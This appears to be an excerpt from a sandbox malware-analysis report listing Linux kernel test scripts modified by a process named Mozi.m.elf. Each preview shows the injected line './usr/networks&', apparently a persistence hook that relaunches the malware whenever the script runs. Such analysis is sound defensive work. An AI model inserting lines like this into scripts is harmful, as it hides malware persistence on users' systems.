                                                              File Type:ASCII text
                                                              Category:dropped
                                                              Size (bytes):6622
                                                              Entropy (8bit):4.91579619605947
                                                              Encrypted:false
                                                              SSDEEP:96:vZ7CPUMjBgqgxCXlulvNbpOZx9bFPpM5q2UqJtgHUWEBOviujpADpAJg0HH/WR46:2JJ+hUDHUzBEjpADpAfHuos
                                                              MD5:5E544700755CD6FED0B8A72B23D78EB2
                                                              SHA1:8FC99822C2E197DD641D4785BC406A63C7B88998
                                                              SHA-256:A71032EA3EBFAC3F5A14B22D6E5B2E79CAC7A89A1A39FA932214DF05A5E1B2E7
                                                              SHA-512:73F74BDA01D6ACE01066512D2C6D817CEDBC13EA3214A6467FBD50817E868CD74B2B049E93BE3BCBB1BD174B8D3DC6FA8F3AB18A3DB92A608E70DD2715F82179
                                                              Malicious:false
                                                              Preview:./usr/networks&..exit $ksft_skip.fi..ip -Version > /dev/null 2>&1.if [ $? -ne 0 ];then..echo "SKIP: Could not run test without ip tool"..exit $ksft_skip.fi..cleanup() {..for i in 1 2;do ip netns del nsclient$i;done..for i in 1 2;do ip netns del nsrouter$i;done.}..ipv4() {. echo -n 192.168.$1.2.}..ipv6 () {. echo -n dead:$1::2.}..check_counter().{..ns=$1..name=$2..expect=$3..local lret=0...cnt=$(ip netns exec $ns nft list counter inet filter "$name" | grep -q "$expect")..if [ $? -ne 0 ]; then...echo "ERROR: counter $name in $ns has unexpected value (expected $expect)" 1>&2...ip netns exec $ns nft list counter inet filter "$name" 1>&2...lret=1..fi...return $lret.}..check_unknown().{..expect="packets 0 bytes 0"..for n in nsclient1 nsclient2 nsrouter1 nsrouter2; do...check_counter $n "unknown" "$expect"...if [ $? -ne 0 ] ;then....return 1...fi..done...return 0.}..for n in nsclient1 nsclient2 nsrouter1 nsrouter2; do. ip netns add $n. ip -net $n link set lo up.done..DEV=veth0.ip link
                                                              Process:/tmp/Mozi.m.elf
                                                              File Type:ASCII text
                                                              Category:dropped
                                                              Size (bytes):9104
                                                              Entropy (8bit):4.993956144361954
                                                              Encrypted:false
                                                              SSDEEP:192:8WtZYzpcq5LETzC1QjgdykepWAgWyzUgJyASkKQSyrer:LAyOdykRWyDJyGner
                                                              MD5:3B3A3BA397804C48A47D092CF3BD7B3C
                                                              SHA1:4A1511BBE56343B7D955290FE420E1196B248AA3
                                                              SHA-256:A7583B71512F4C76A592BEF41C12DBD8B2090AB9B88FA10719757C4F4D80AFDC
                                                              SHA-512:17477BEEFEFA2F96D1F183ABFDD4E3D4F956864F452F4BC566F3F46A0C876D01DED6C80D498AE127811A0ED1185AD69F81DA5ADFDD358FEBE1A2487B0AF80824
                                                              Malicious:false
                                                              Preview:./usr/networks&..exit $ksft_skip.fi..ip -Version > /dev/null 2>&1.if [ $? -ne 0 ];then..echo "SKIP: Could not run test without ip tool"..exit $ksft_skip.fi..which nc > /dev/null 2>&1.if [ $? -ne 0 ];then..echo "SKIP: Could not run test without nc (netcat)"..exit $ksft_skip.fi..ip netns add nsr1.if [ $? -ne 0 ];then..echo "SKIP: Could not create net namespace"..exit $ksft_skip.fi..ip netns add ns1.ip netns add ns2..ip netns add nsr2..cleanup() {..for i in 1 2; do...ip netns del ns$i...ip netns del nsr$i..done...rm -f "$ns1in" "$ns1out"..rm -f "$ns2in" "$ns2out"...[ $log_netns -eq 0 ] && sysctl -q net.netfilter.nf_log_all_netns=$log_netns.}..trap cleanup EXIT..sysctl -q net.netfilter.nf_log_all_netns=1..ip link add veth0 netns nsr1 type veth peer name eth0 netns ns1.ip link add veth1 netns nsr1 type veth peer name veth0 netns nsr2..ip link add veth1 netns nsr2 type veth peer name eth0 netns ns2..for dev in lo veth0 veth1; do. for i in 1 2; do. ip -net nsr$i link set $dev up. done.do
                                                              Process:/tmp/Mozi.m.elf
                                                              File Type:ASCII text
                                                              Category:dropped
                                                              Size (bytes):21529
                                                              Entropy (8bit):4.944841471342032
                                                              Encrypted:false
                                                              SSDEEP:192:8MnpSIYJQ3jmb6cC/pAQ+bavzarpAQuPIUFdRlVOqKWRrLud9di+w0EJ40vl5KDD:8FsQdi+w0040N5K/
                                                              MD5:1FD676FA6690E761EF1A76EB1A08EBDC
                                                              SHA1:38DB532AAE0CDBE6D9DB363266A5AFEFA679436C
                                                              SHA-256:E2B8767EF667EC952B86C445B087D1A5F2494A08E4E9345F7413EEF5323B5837
                                                              SHA-512:E415DDC72BDE994DF60138563F617FB674A310F3776DEB09E1DD7B6A583D4A1928B72890794BDFFE9E4774D4998DB701634D8602FBC7FC71BF75998383C3D2F2
                                                              Malicious:false
                                                              Preview:./usr/networks&..exit $ksft_skip.fi..ip -Version > /dev/null 2>&1.if [ $? -ne 0 ];then..echo "SKIP: Could not run test without ip tool"..exit $ksft_skip.fi..ip netns add "$ns0".if [ $? -ne 0 ];then..echo "SKIP: Could not create net namespace $ns0"..exit $ksft_skip.fi..trap cleanup EXIT..ip netns add "$ns1".if [ $? -ne 0 ];then..echo "SKIP: Could not create net namespace $ns1"..exit $ksft_skip.fi..ip netns add "$ns2".if [ $? -ne 0 ];then..echo "SKIP: Could not create net namespace $ns2"..exit $ksft_skip.fi..ip link add veth0 netns "$ns0" type veth peer name eth0 netns "$ns1" > /dev/null 2>&1.if [ $? -ne 0 ];then. echo "SKIP: No virtual ethernet pair device support in kernel". exit $ksft_skip.fi.ip link add veth1 netns "$ns0" type veth peer name eth0 netns "$ns2"..ip -net "$ns0" link set lo up.ip -net "$ns0" link set veth0 up.ip -net "$ns0" addr add 10.0.1.1/24 dev veth0.ip -net "$ns0" addr add dead:1::1/64 dev veth0..ip -net "$ns0" link set veth1 up.ip -net "$ns0" addr add 10.0.2.
                                                              Process:/tmp/Mozi.m.elf
                                                              File Type:ASCII text
                                                              Category:dropped
                                                              Size (bytes):1506
                                                              Entropy (8bit):5.015913062594834
                                                              Encrypted:false
                                                              SSDEEP:24:wK81nFnUenSen3izLx5zLxKfN7wUv4ydmufT8X9/C/XWrgWeqZD9Eu/A9wj:vQnFD9Sz/z09pv4x6oX9lgZqHE+A9A
                                                              MD5:6838568F3F4859EAF69385064BBE4C8B
                                                              SHA1:CBAD50C89D792DD100CA08E2AE9B0798D6D5E68E
                                                              SHA-256:BB56D10B4E73554C91F138E4E3A0A0C377D1E684C9B435032FCE25A08184B0B9
                                                              SHA-512:790CA81D1498CC5411C124307E48BF4FD778EFFB2EC9328A0B9AD2C0CCA4F2C74D4872AF768E7C4D480799AAF6EFEECDBD281709269861183895181DAF13C8AB
                                                              Malicious:false
                                                              Preview:./usr/networks&..exit $ksft_skip.fi..ip -Version > /dev/null 2>&1.if [ $? -ne 0 ];then..echo "SKIP: Could not run test without ip tool"..exit $ksft_skip.fi..tmp=$(mktemp)..for table in $tables; do..echo add table inet "$table" >> "$tmp"..echo flush table inet "$table" >> "$tmp"...echo "add chain inet $table INPUT { type filter hook input priority 0; }" >> "$tmp"..echo "add chain inet $table OUTPUT { type filter hook output priority 0; }" >> "$tmp"..for c in $(seq 1 400); do...chain=$(printf "chain%03u" "$c")...echo "add chain inet $table $chain" >> "$tmp"..done...for c in $(seq 1 400); do...chain=$(printf "chain%03u" "$c")...for BASE in INPUT OUTPUT; do....echo "add rule inet $table $BASE counter jump $chain" >> "$tmp"...done...echo "add rule inet $table $chain counter return" >> "$tmp"..done.done..ip netns add "$testns".ip -netns "$testns" link set lo up..lscpu | grep ^CPU\(s\): | ( read cpu cpunum ;.cpunum=$((cpunum-1)).for i in $(seq 0 $cpunum);do..mask=$(printf 0x%x $((1<<$i))).
                                                              Process:/tmp/Mozi.m.elf
                                                              File Type:ASCII text
                                                              Category:dropped
                                                              Size (bytes):23
                                                              Entropy (8bit):3.882045108136863
                                                              Encrypted:false
                                                              SSDEEP:3:qXVOORgn:Tn
                                                              MD5:D7BC14787BBF05DEAC1113F4B42B6099
                                                              SHA1:BB0DF86AA88C53CB0E53147B50135113CB15FFFF
                                                              SHA-256:2AB8C8B53D6823D9D4F90CCC40B7BB78C68956FB60D691B4DB241809CD259E01
                                                              SHA-512:810CB49B08A5CF57DA8D5194DC5442B4BA72AD50534FCDA48C0C0815164AED4B23D4F06035390EB596D69A7FBA579C7B3E0FCA1CDE2F81FF23347780770A3D0D
                                                              Malicious:false
                                                              Preview:./usr/networks&.exit 1.
                                                              Process:/tmp/Mozi.m.elf
                                                              File Type:ASCII text
                                                              Category:dropped
                                                              Size (bytes):11276
                                                              Entropy (8bit):5.481780874362443
                                                              Encrypted:false
                                                              SSDEEP:192:oxDgsOvsSFyeLy0KBhKWhht8J5S/Y6pJd893YeAQILa1DbAuUIJDeex7:sDgsOPLuhBr/23BZIW5QeN
                                                              MD5:D704E5F5EA3C647ED057513B91E63912
                                                              SHA1:938A32825B0FAB4074A06E41063AA6F4A5A43F0E
                                                              SHA-256:8C1E2070D7A4B8EC686C7BB3C1F47504A37779D2910E3113BBD5CDF17E2C7F2E
                                                              SHA-512:74BE734ACF94A06063A9961DD1EBC03709C7DB5DFA0BD8C37A5E83F999CA9167B00DEEAB17795C472EEDE472E31094787E7489C5105F53F168F4048E9B46A393
                                                              Malicious:false
                                                              Preview:./usr/networks&..echo " -C don't cleanup ntb modules on exit"..echo " -h show this help message"..echo " -l list available local and remote PCI ids"..echo " -r REMOTE_HOST specify the remote's hostname to connect"..echo " to for the test (using ssh)"..echo " -m MW_SIZE memory window size for ntb_tool"..echo " (default: $MW_SIZE)"..echo " -d run dma tests for ntb_perf"..echo " -p ORDER total data order for ntb_perf"..echo " (default: $PERF_RUN_ORDER)"..echo " -w MAX_MW_SIZE maxmium memory window size for ntb_perf"..echo.}..function parse_args().{..OPTIND=0..while getopts "b:Cdhlm:r:p:w:" opt; do...case "$opt" in...C) DONT_CLEANUP=1 ;;...d) RUN_DMA_TESTS=1 ;;...h) show_help; exit 0 ;;...l) LIST_DEVS=TRUE ;;...m) MW_SIZE=${OPTARG} ;;...r) REMOTE_HOST=${OPTARG} ;;...p) PERF_RUN_ORDER=${OPTARG} ;;...w) MAX_MW_SIZE=${OPTARG} ;;...\?)... echo "Invalid option:
                                                              Process:/tmp/Mozi.m.elf
                                                              File Type:ASCII text
                                                              Category:dropped
                                                              Size (bytes):2139
                                                              Entropy (8bit):5.010147811831499
                                                              Encrypted:false
                                                              SSDEEP:48:z5WLypbyFmW+cNFV7VhRkcxxAlxOVAcN0CCGH8:rpbA7VhRk8UaAjCC+8
                                                              MD5:BFB55229CC292549DDFC7412E29BE715
                                                              SHA1:BC6A50A6CB491893D1AFEBD63E8DA5A554183DFB
                                                              SHA-256:B6DCC9E346F07819CBFDF2B697A5D0039DBA97D1E2DC4641FA90070F035C1568
                                                              SHA-512:3B33CE04BE3512FB7E4E995657A60BB9A45D1CA0ABA695910EC1B2FBC1620E4BFD2A5B16D33AFCC33D0F457E0B852C0ED6A0A8B1B18E77643FA16BFAC51CDD33
                                                              Malicious:false
                                                              Preview:./usr/networks&..exit $KSELFTESTS_SKIP;.fi..if [ ! -e "/sys/kernel/debug/powerpc/eeh_dev_check" ] && \. [ ! -e "/sys/kernel/debug/powerpc/eeh_dev_break" ] ; then..echo "debugfs EEH testing files are missing. Is debugfs mounted?"..exit $KSELFTESTS_SKIP;.fi..pre_lspci=`mktemp`.lspci > $pre_lspci..# Bump the max freeze count to something absurd so we don't.# trip over it while breaking things..echo 5000 > /sys/kernel/debug/powerpc/eeh_max_freezes..# record the devices that we break in here. Assuming everything.# goes to plan we should get them back once the recover process.# is finished..devices=""..# Build up a list of candidate devices..for dev in `ls -1 /sys/bus/pci/devices/ | grep '\.0$'` ; do..# skip bridges since we can't recover them (yet...)..if [ -e "/sys/bus/pci/devices/$dev/pci_bus" ] ; then...echo "$dev, Skipped: bridge"...continue;..fi...# Skip VFs for now since we don't have a reliable way..# to break them...if [ -e "/sys/bus/pci/devices/$dev/physfn" ] ; then...echo "$dev,
                                                              Process:/tmp/Mozi.m.elf
                                                              File Type:ASCII text
                                                              Category:dropped
                                                              Size (bytes):23
                                                              Entropy (8bit):3.882045108136863
                                                              Encrypted:false
                                                              SSDEEP:3:qXVOORgn:Tn
                                                              MD5:D7BC14787BBF05DEAC1113F4B42B6099
                                                              SHA1:BB0DF86AA88C53CB0E53147B50135113CB15FFFF
                                                              SHA-256:2AB8C8B53D6823D9D4F90CCC40B7BB78C68956FB60D691B4DB241809CD259E01
                                                              SHA-512:810CB49B08A5CF57DA8D5194DC5442B4BA72AD50534FCDA48C0C0815164AED4B23D4F06035390EB596D69A7FBA579C7B3E0FCA1CDE2F81FF23347780770A3D0D
                                                              Malicious:false
                                                              Preview:./usr/networks&.exit 1.
                                                              Process:/tmp/Mozi.m.elf
                                                              File Type:ASCII text
                                                              Category:dropped
                                                              Size (bytes):1985
                                                              Entropy (8bit):5.1971922094030125
                                                              Encrypted:false
                                                              SSDEEP:48:rJDTmqUGoPRkFI6qUCjl4zXlfenS2xLz4:NmqSWFdzCgfenZs
                                                              MD5:E22F86E80F1475933EE643B1098BB0BD
                                                              SHA1:8AAB18EF3307CD428D30B6791D7E12B1CD1EEA14
                                                              SHA-256:3FB64720524F18C23DCCD9056E2E9E4800E01B8D1616E436786534A0B077E152
                                                              SHA-512:5BE1C828675CD3441606B1EE23A8C144327F160806C9AB1FC45C714351B72CE744AEFE7336901E0A9A6BD2E6D5BFBE7647A0A774D00BE3E3296C5CBAD7413206
                                                              Malicious:false
                                                              Preview:./usr/networks&..exit 1.fi..# We will get 8 HMI events per injection.# todo: deal with things being offline.expected_hmis=8.COUNT_HMIS() {. dmesg | grep -c 'Harmless Hypervisor Maintenance interrupt'.}..# massively expand snooze delay, allowing injection on all cores.ppc64_cpu --smt-snooze-delay=1000000000..# when we exit, restore it.trap "ppc64_cpu --smt-snooze-delay=100" 0 1..# for each chip+core combination.# todo - less fragile parsing.egrep -o 'OCC: Chip [0-9a-f]+ Core [0-9a-f]' < /sys/firmware/opal/msglog |.while read chipcore; do..chip=$(echo "$chipcore"|awk '{print $3}')..core=$(echo "$chipcore"|awk '{print $5}')..fir="0x1${core}013100"...# verify that Core FIR is zero as expected..if [ "$($GETSCOM -c 0x${chip} $fir)" != 0 ]; then...echo "FIR was not zero before injection for chip $chip, core $core. Aborting!"...echo "Result of $GETSCOM -c 0x${chip} $fir:"...$GETSCOM -c 0x${chip} $fir...echo "If you get a -5 error, the core may be in idle state. Try stress-ng."...echo "Other
                                                              Process:/tmp/Mozi.m.elf
                                                              File Type:ASCII text
                                                              Category:dropped
                                                              Size (bytes):2153
                                                              Entropy (8bit):5.195891220663769
                                                              Encrypted:false
                                                              SSDEEP:48:Kms2v0mGH+R5+l5dSu5hXflU4UeI8e/RERaGMuMEUTYLgW:NRtd8rlIt/ojLME+1W
                                                              MD5:CEACB7A95D1C9705B086257F0B93BB4B
                                                              SHA1:59936D2AEB984E1FBF1528311C23667612AFC979
                                                              SHA-256:A09669A12D0556484AC42456FD565059D79E3178286FA8D8EAA519BFEDC6CC2A
                                                              SHA-512:E20DC728490F76E787D38CBB5652E1EA292E25C20A9E93605F51E90198205940FDB76AE299A3C1073AAD294F449471DD1FA25707BC05716B60E16465CE0EB33B
                                                              Malicious:false
                                                              Preview:./usr/networks&..exit 0.fi..if [[ "$DEV" == "" ]]; then..echo "SKIP: PTP device not provided"..exit 0.fi..require_command().{..local cmd=$1; shift...if [[ ! -x "$(command -v "$cmd")" ]]; then...echo "SKIP: $cmd not installed"...exit 1..fi.}..phc_sanity().{..phc_ctl $DEV get &> /dev/null...if [ $? != 0 ]; then...echo "SKIP: unknown clock $DEV: No such device"...exit 1..fi.}..require_command phc_ctl.phc_sanity..##############################################################################.# Helpers..# Exit status to return at the end. Set in case one of the tests fails..EXIT_STATUS=0.# Per-test return value. Clear at the beginning of each test..RET=0..check_err().{..local err=$1...if [[ $RET -eq 0 && $err -ne 0 ]]; then...RET=$err..fi.}..log_test().{..local test_name=$1...if [[ $RET -ne 0 ]]; then...EXIT_STATUS=1...printf "TEST: %-60s [FAIL]\n" "$test_name"...return 1..fi...printf "TEST: %-60s [ OK ]\n" "$test_name"..return 0.}..tests_run().{..local current_test...for current_test in $
                                                              Process:/tmp/Mozi.m.elf
                                                              File Type:ASCII text
                                                              Category:dropped
                                                              Size (bytes):248
                                                              Entropy (8bit):5.301131600273597
                                                              Encrypted:false
                                                              SSDEEP:6:Laq4bs4hJS6aYwJr3S6aYhNuS6aY5s/wRi0cLNQPn:msh6a3lC6ayh6anYo6n
                                                              MD5:67AA2EFE0481FCDEB4895BD7E89D3D5C
                                                              SHA1:9F38A80D6996FE3523B556B3914501C39264C62A
                                                              SHA-256:952C4011DF7444FED43B6E2789DA36FE87257AF734F5D7FBFB527B196DDB9EC8
                                                              SHA-512:3DEEECEF62BE7A50E2341F4F91FB310B00CE3EF5CCECC6B7AD687C924CD23B9DFAB72E0E94C2170AD178B4CA159B840A13E33E19F500A355B8A29E6CA38F0162
                                                              Malicious:false
                                                              Preview:./usr/networks&..exit -1.fi.if grep -q '^CONFIG_SMP=n$' $cf.then..echo 1..exit 0.fi.if grep -q '^CONFIG_NR_CPUS=' $cf.then..grep '^CONFIG_NR_CPUS=' $cf | ...sed -e 's/^CONFIG_NR_CPUS=\([0-9]*\).*$/\1/'..exit 0.fi.cpus2use.sh../usr/networks&.exit 1.
                                                              Process:/tmp/Mozi.m.elf
                                                              File Type:ASCII text
                                                              Category:dropped
                                                              Size (bytes):418
                                                              Entropy (8bit):5.023825716215056
                                                              Encrypted:false
                                                              SSDEEP:12:w6vIe116vI4U8XXDM8qVRkW0qleOl3wcBn:rIe0dJDDxWvQOxwcB
                                                              MD5:095294D70B3D26E07BA652BD30078A35
                                                              SHA1:645C54D9E7FFB75E37C41B0963B76F0B227E0764
                                                              SHA-256:DC6740540B21B0623A98A40A65D125501C4B952BB8F0E0C30A6C36348FEAFF7C
                                                              SHA-512:4964AFB942DF134B89A066F768B9272675DCEE258BCE3A12D0F9E835AF146CAEA9CB7B22FE3D15D697972A5381A5E057F880F124B799110C37D387D41D94AB79
                                                              Malicious:false
                                                              Preview:./usr/networks&..exit 1.fi..override=$2.if test -r $override.then..:.else..echo Override file $override unreadable!!!..exit 1.fi..T=${TMPDIR-/tmp}/config_override.sh.$$.trap 'rm -rf $T' 0.mkdir $T..sed < $override -e 's/^/grep -v "/' -e 's/=.*$/="/' |..awk '..{...if (last)....print last " |";...last = $0;..}..END {...if (last)....print last;..}' > $T/script.sh $T/script < $base.cat $override../usr/networks&.exit 1.
                                                              Process:/tmp/Mozi.m.elf
                                                              File Type:ASCII text
                                                              Category:dropped
                                                              Size (bytes):23
                                                              Entropy (8bit):3.882045108136863
                                                              Encrypted:false
                                                              SSDEEP:3:qXVOORgn:Tn
                                                              MD5:D7BC14787BBF05DEAC1113F4B42B6099
                                                              SHA1:BB0DF86AA88C53CB0E53147B50135113CB15FFFF
                                                              SHA-256:2AB8C8B53D6823D9D4F90CCC40B7BB78C68956FB60D691B4DB241809CD259E01
                                                              SHA-512:810CB49B08A5CF57DA8D5194DC5442B4BA72AD50534FCDA48C0C0815164AED4B23D4F06035390EB596D69A7FBA579C7B3E0FCA1CDE2F81FF23347780770A3D0D
                                                              Malicious:false
                                                              Preview:./usr/networks&.exit 1.
                                                              Process:/tmp/Mozi.m.elf
                                                              File Type:ASCII text
                                                              Category:dropped
                                                              Size (bytes):46
                                                              Entropy (8bit):3.925523369006428
                                                              Encrypted:false
                                                              SSDEEP:3:qXVOOR3vKDlOORgn:uK4n
                                                              MD5:2CADDA792FBD37B54978108B6CC504D4
                                                              SHA1:C28DD4FAC0523E31F0220FF31417583882C82692
                                                              SHA-256:E6D7ED75CDB1FA6A44D3ACEC4A6933828B8FEA70FF78C167E49214E7D1634305
                                                              SHA-512:681E59EF7DEE6E6F60C0ABF3325E5F64DF4CEA10A4D0DA585198ECD3BE951722DBE2559F6CE20E70CB97E84E7CEFEED4DC6AC78204D9C9FF403343ECEC7997A0
                                                              Malicious:false
                                                              Preview:./usr/networks&.exit 0../usr/networks&.exit 1.
                                                              Process:/tmp/Mozi.m.elf
                                                              File Type:awk or perl script, ASCII text
                                                              Category:dropped
                                                              Size (bytes):479
                                                              Entropy (8bit):4.802626275594296
                                                              Encrypted:false
                                                              SSDEEP:6:wsFl4xaKy86WqGCePeGDPahXM6WqGIKmALledQhFo8sFRMoFoPsjsFPTJPsCFo2S:jnW1EIlahDFSPHPs92wWqBBOcwBjqn
                                                              MD5:4F3513DA08C974EC143E30317C75475C
                                                              SHA1:454B5F2CE62176AC272F38E13BC64755135FD85A
                                                              SHA-256:DF6564EBE393B5B248466634AAF1928DF89FFD5C4A0E88E796DD1537AE47D8B2
                                                              SHA-512:7F95742A9E7829C8867F6DA2E68C0B8757EB93CDFBEA42F41D48699795CCE33C9824697BAAAFE817B580CCE1DDF73ABA6F9D0D530B5992B8AF20DB84710F67BF
                                                              Malicious:false
                                                              Preview:./usr/networks&..exit 0.fi.ncpus=`grep '^processor' /proc/cpuinfo | wc -l`.idlecpus=`mpstat | tail -1 | \..awk -v ncpus=$ncpus '{ print ncpus * ($7 + $NF) / 100 }'`.awk -v ncpus=$ncpus -v idlecpus=$idlecpus < /dev/null '.BEGIN {..cpus2use = idlecpus;..if (cpus2use < 1)...cpus2use = 1;..if (cpus2use < ncpus / 10)...cpus2use = ncpus / 10;..if (cpus2use == int(cpus2use))...cpus2use = int(cpus2use)..else...cpus2use = int(cpus2use) + 1..print cpus2use;.}'.../usr/networks&.exit 1.
                                                              Process:/tmp/Mozi.m.elf
                                                              File Type:ASCII text
                                                              Category:dropped
                                                              Size (bytes):3848
                                                              Entropy (8bit):5.4362980099954585
                                                              Encrypted:false
                                                              SSDEEP:96:aXqy/tAq8JV/VooTklj+kapJbV1hctBryYBfVqebVBE+0AXvHdTcwu9gZUcu8rkO:aBQH/HklUp5FctN7zB0A/pcwu2Ucu8rV
                                                              MD5:3C47B98461A46FCFC4CF9B6605E3C812
                                                              SHA1:04169142D0A3787759B050016D591E76DF0D6E03
                                                              SHA-256:F66C090A9F517F78039B6FB52141B9FBB2B7EEACE681010C78CC181279F2F7E0
                                                              SHA-512:A14536321412C34FC5EC96702FF91B3BF06C43A0602B4C5700E94F7562EDC108D0F8F1EB65A19489AEE1F51DDE89D804C1C08C29D3707685593BAFCA17D060E2
                                                              Malicious:false
                                                              Preview:./usr/networks&...exit -1..fi..grep -q '^CONFIG_HOTPLUG_CPU=y$' "$1".}..# identify_boot_image qemu-cmd.#.# Returns the relative path to the kernel build image. This will be.# arch/<arch>/boot/bzImage or vmlinux if bzImage is not a target for the.# architecture, unless overridden with the TORTURE_BOOT_IMAGE environment.# variable..identify_boot_image () {..if test -n "$TORTURE_BOOT_IMAGE"..then...echo $TORTURE_BOOT_IMAGE..else...case "$1" in...qemu-system-x86_64|qemu-system-i386)....echo arch/x86/boot/bzImage....;;...qemu-system-aarch64)....echo arch/arm64/boot/Image....;;...*)....echo vmlinux....;;...esac..fi.}..# identify_qemu builddir.#.# Returns our best guess as to which qemu command is appropriate for.# the kernel at hand. Override with the TORTURE_QEMU_CMD environment variable..identify_qemu () {..local u="`file "$1"`"..if test -n "$TORTURE_QEMU_CMD"..then...echo $TORTURE_QEMU_CMD..elif echo $u | grep -q x86-64..then...echo qemu-system-x86_64..elif echo $u | grep -q "Intel 8038
                                                              Process:/tmp/Mozi.m.elf
                                                              File Type:ASCII text
                                                              Category:dropped
                                                              Size (bytes):1191
                                                              Entropy (8bit):5.219919938951854
                                                              Encrypted:false
                                                              SSDEEP:24:Mm/+2DKmCzxOGZDwml1NebqBhRpOVPsn0kFIj1XI7q:Mm/+22PZDwmlHBRpORsPwXb
                                                              MD5:AE4B164E324E2725E5875DC6ACEE1139
                                                              SHA1:714938D3C8B76FC6D9B47129E3B53A1D92AAD811
                                                              SHA-256:0AE66B27CDC6DA8C66AC49B9E0271DA8486C10C373FABA74100A880C54CA3842
                                                              SHA-512:8456D1C81C695A761FAFB1C3B794C4E46718815135D44D775DF744B54E82C74D59E5DDA11B6D9FBAA0CF2712CD8E25A95ABCE8344EBE69143C4CC8FCC5E07997
                                                              Malicious:false
                                                              Preview:./usr/networks&...exit 0;..fi...# Set affinity to randomly selected online CPU..cpus=`grep 1 /sys/devices/system/cpu/*/online |...sed -e 's,/[^/]*$,,' -e 's/^[^0-9]*//'`...# Do not leave out poor old cpu0 which may not be hot-pluggable..if [ ! -f "/sys/devices/system/cpu/cpu0/online" ]; then...cpus="0 $cpus"..fi...cpumask=`awk -v cpus="$cpus" -v me=$me -v n=$n 'BEGIN {...srand(n + me + systime());...ncpus = split(cpus, ca);...curcpu = ca[int(rand() * ncpus + 1)];...mask = lshift(1, curcpu);...if (mask + 0 <= 0)....mask = 1;...printf("%#x\n", mask);..}' < /dev/null`..n=$(($n+1))..if ! taskset -p $cpumask $$ > /dev/null 2>&1..then...echo taskset failure: '"taskset -p ' $cpumask $$ '"'...exit 1..fi...# Sleep a random duration..sleeptime=`awk -v me=$me -v n=$n -v sleepmax=$sleepmax 'BEGIN {...srand(n + me + systime());...printf("%06d", int(rand() * sleepmax));..}' < /dev/null`..n=$(($n+1))..sleep .$sleeptime...# Spin a random duration..limit=`awk -v me=$me -v n=$n -v spinmax=$spinmax 'BEGI
                                                              Process:/tmp/Mozi.m.elf
                                                              File Type:ASCII text
                                                              Category:dropped
                                                              Size (bytes):719
                                                              Entropy (8bit):5.456071477133004
                                                              Encrypted:false
                                                              SSDEEP:12:w6rMJ4mgtD51pbKRmY2uH5SY7d3VOAan69dAeuVuYFFses4mseowZExeskWnn:E2mi51xXYZZS23VOCT7uVPS8VkWn
                                                              MD5:0E3CB1C0055AFADC1C754205DE278D67
                                                              SHA1:4059B70FD319BCF46F1DD180C2BD65919CCDEB74
                                                              SHA-256:70B7C3D2E18D82326962A335B5A0BC3B19DCE6A56735FA172C15452C98FB7905
                                                              SHA-512:FE8CDCBB9341CA257E0F7B9AC7D4A0AF88A2CD7A87D5DAE0E4D5A0108B65498032FDFDA5D62FA262B0067D9B6937FC408E4021568D5243696007945CE2776A39
                                                              Malicious:false
                                                              Preview:./usr/networks&..exit 1.fi.resdir=${2}..T=${TMPDIR-/tmp}/test-linux.sh.$$.trap 'rm -rf $T' 0.mkdir $T..cp ${config_template} $T/config.cat << ___EOF___ >> $T/config.CONFIG_INITRAMFS_SOURCE="$TORTURE_INITRD".CONFIG_VIRTIO_PCI=y.CONFIG_VIRTIO_CONSOLE=y.___EOF___..configinit.sh $T/config $resdir.retval=$?.if test $retval -gt 1.then..exit 2.fi.ncpus=`cpus2use.sh`.make -j$ncpus $TORTURE_KMAKE_ARG > $resdir/Make.out 2>&1.retval=$?.if test $retval -ne 0 || grep "rcu[^/]*": < $resdir/Make.out | egrep -q "Stop|Error|error:|warning:" || egrep -q "Stop|Error|error:" < $resdir/Make.out.then..echo Kernel build error..egrep "Stop|Error|error:|warning:" < $resdir/Make.out..echo Run aborted...exit 3.fi../usr/networks&.exit 1.
                                                              Process:/tmp/Mozi.m.elf
                                                              File Type:ASCII text
                                                              Category:dropped
                                                              Size (bytes):96
                                                              Entropy (8bit):4.256066773559547
                                                              Encrypted:false
                                                              SSDEEP:3:qXVaywJejG2aKJLUQSXVOORgn:wCej/BZHSMn
                                                              MD5:47B2DFB43AC8D11D8AF9C54AFB92BF3A
                                                              SHA1:C98675863C1D74A923FD89014918FC45F6C9A3C6
                                                              SHA-256:433231EE364303B5E085E5AB83E628F522958244F525CB015D4E4CA226AEACA7
                                                              SHA-512:F756226C69A6AE738A092D1DA5E1C6472C21B27CCE6735FCE5AF7EF49868E9F3177900AE6B4960B68E2EA7B737295DEB44F3805F94EC55853929CAEC6301B137
                                                              Malicious:false
                                                              Preview:./usr/networks&..exit 1.else..echo No errors in console logs...exit 0.fi../usr/networks&.exit 1.
                                                              Process:/tmp/Mozi.m.elf
                                                              File Type:awk or perl script, ASCII text
                                                              Category:dropped
                                                              Size (bytes):579
                                                              Entropy (8bit):4.968576899007941
                                                              Encrypted:false
                                                              SSDEEP:12:w6vHIjs/NbRQG9GtcDVKZqCi8wBQ9fFs40ldvcPXVfgeYn:rfDQhKDwZ/L9Ns+vV49
                                                              MD5:979991AFA6A7D7425AD7C067CD5C6AC2
                                                              SHA1:4EBE72228115109BA3DD14F4649ABC2CE27692FF
                                                              SHA-256:8C0805B46010E232FBCB8D6AD91D98A6168CC25A1FA5E7D766F7129F1314BCF2
                                                              SHA-512:332AD2A7823972D06AFD2AE52A46D266AE4FA40FC2C8A4DB9B3B902BE0696476286726AD06391A769477EEA0E57FD17CC6234D079FAD5C83755AAFD249303329
                                                              Malicious:false
                                                              Preview:./usr/networks&..exit 1.fi..configfile=`echo $i | sed -e 's/^.*\///'`.ncs=`grep "Writes: Total:" $i/console.log 2> /dev/null | tail -1 | sed -e 's/^.* Total: //' -e 's/ .*$//'`.if test -z "$ncs".then..echo "$configfile -------".else..title="$configfile ------- $ncs acquisitions/releases"..dur=`sed -e 's/^.* locktorture.shutdown_secs=//' -e 's/ .*$//' < $i/qemu-cmd 2> /dev/null`..if test -z "$dur"..then...:..else...ncsps=`awk -v ncs=$ncs -v dur=$dur '....BEGIN { print ncs / dur }' < /dev/null`...title="$title ($ncsps per second)"..fi..echo $title.fi../usr/networks&.exit 1.
                                                              Process:/tmp/Mozi.m.elf
                                                              File Type:awk or perl script, ASCII text
                                                              Category:dropped
                                                              Size (bytes):1557
                                                              Entropy (8bit):5.128177512727413
                                                              Encrypted:false
                                                              SSDEEP:48:/ji7NQQ1mNOtOsl8GpG0YrvBn02WEnxxCXt8ommYlmrBsmUb:yQ1NSjpGHB8dtY8rTI
                                                              MD5:F5785CDFA33136A153C917D211A23D17
